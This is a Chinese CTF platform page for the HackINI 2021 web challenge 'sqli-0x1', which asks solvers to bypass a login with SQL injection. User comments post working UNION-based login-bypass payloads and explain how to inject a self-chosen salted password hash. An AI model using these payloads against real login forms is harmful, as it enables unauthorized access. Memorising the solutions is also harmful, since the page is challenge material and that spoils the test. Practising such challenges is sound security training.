sqli-0x1WEB 未解决

分数: 0 金币: 0
所属赛事: HackINI 2021
题目作者: 未知
一  血: Aman
一血奖励: 0金币
解  决: 2312
提  示: shellmates{********}
描  述:

SQL injections are still a problem yes, even in 2021.
Bypass the login mechanism and get access to the admin area.

...
登录回复
评论
AsanoHoshiya 13天前
举报

很有水平的一道题

回复 0
出题人我会一直让你等着 1月前
举报

admin' UNION SELECT 1, 'admin', '21232f297a57a5a743894a0e4a801fc3'# 为什么这个会被检测出来

回复 0
Zpfhh 3月前
举报

用POST请求这个payload:user=a'union%09select%092,'7d0515bb9407af379e2ab13a58ee470d1f8815f56ffffa07ee5c0136e00fea0d$ttack'--+&pass=hacka 用HackBar工具秒解

回复 1
cfggfbfxdgbb 3月前
举报

我的wp: https://blog.csdn.net/cfggbfxdgbb/article/details/155936538?spm=1001.2014.3001.5502

回复 0
hengdonghui 3月前
举报

格式是: shellmates{********} 不是flag{******}格式。

回复 0
白乐 4月前
举报

如何知道它是SHA-256加密的呢,以及它是如何排列的呢

回复 0
L0GAN 3月前
举报

/?pls_help,审计代码

回复 0
Alune 4月前
举报

加盐密码哈希

回复 0
15031597817 6月前
举报

这个登上以后不出flag咋办

回复 1
a543589796 7月前
举报

这道题为什么sqlmap跑不出来啊?

回复 0
lunarbyside 10月前
举报

user=1'union select 1,'你的密码与你的盐值拼接后的字符串计算的哈希值$你的盐值&pass=你的密码。第一列为用户名username,第二列为密码password。由于查询不到用户“1”,所以查询返回的结果被union后面的值替代,第二列password值会被替换为你的哈希值和你的盐值,你就能用自己的密码登录啦☺

回复 4

WriteUp

image
a2cai

2 金币

立即查看

评分(29)

解题动态

qhdeubd 攻破了该题 6小时前
suliux_125 攻破了该题 11小时前
qetx 攻破了该题 11小时前
wywzbjzlzzkz 攻破了该题 11小时前
qq111111 攻破了该题 12小时前
HexHackerCat 攻破了该题 14小时前
X-C 攻破了该题 1天前
柒153 攻破了该题 1天前
SuperFan 攻破了该题 2天前
自定义 攻破了该题 2天前
3268798994 攻破了该题 3天前
seyana 攻破了该题 3天前
ZhouShijun 攻破了该题 3天前
hahahalalala 攻破了该题 3天前
每天想吃海底捞 攻破了该题 3天前
maxiaoyu 攻破了该题 4天前
Xiaoniu001 攻破了该题 4天前
SamJij 攻破了该题 4天前
cbb02 攻破了该题 4天前
风继续吹 攻破了该题 4天前
问题反馈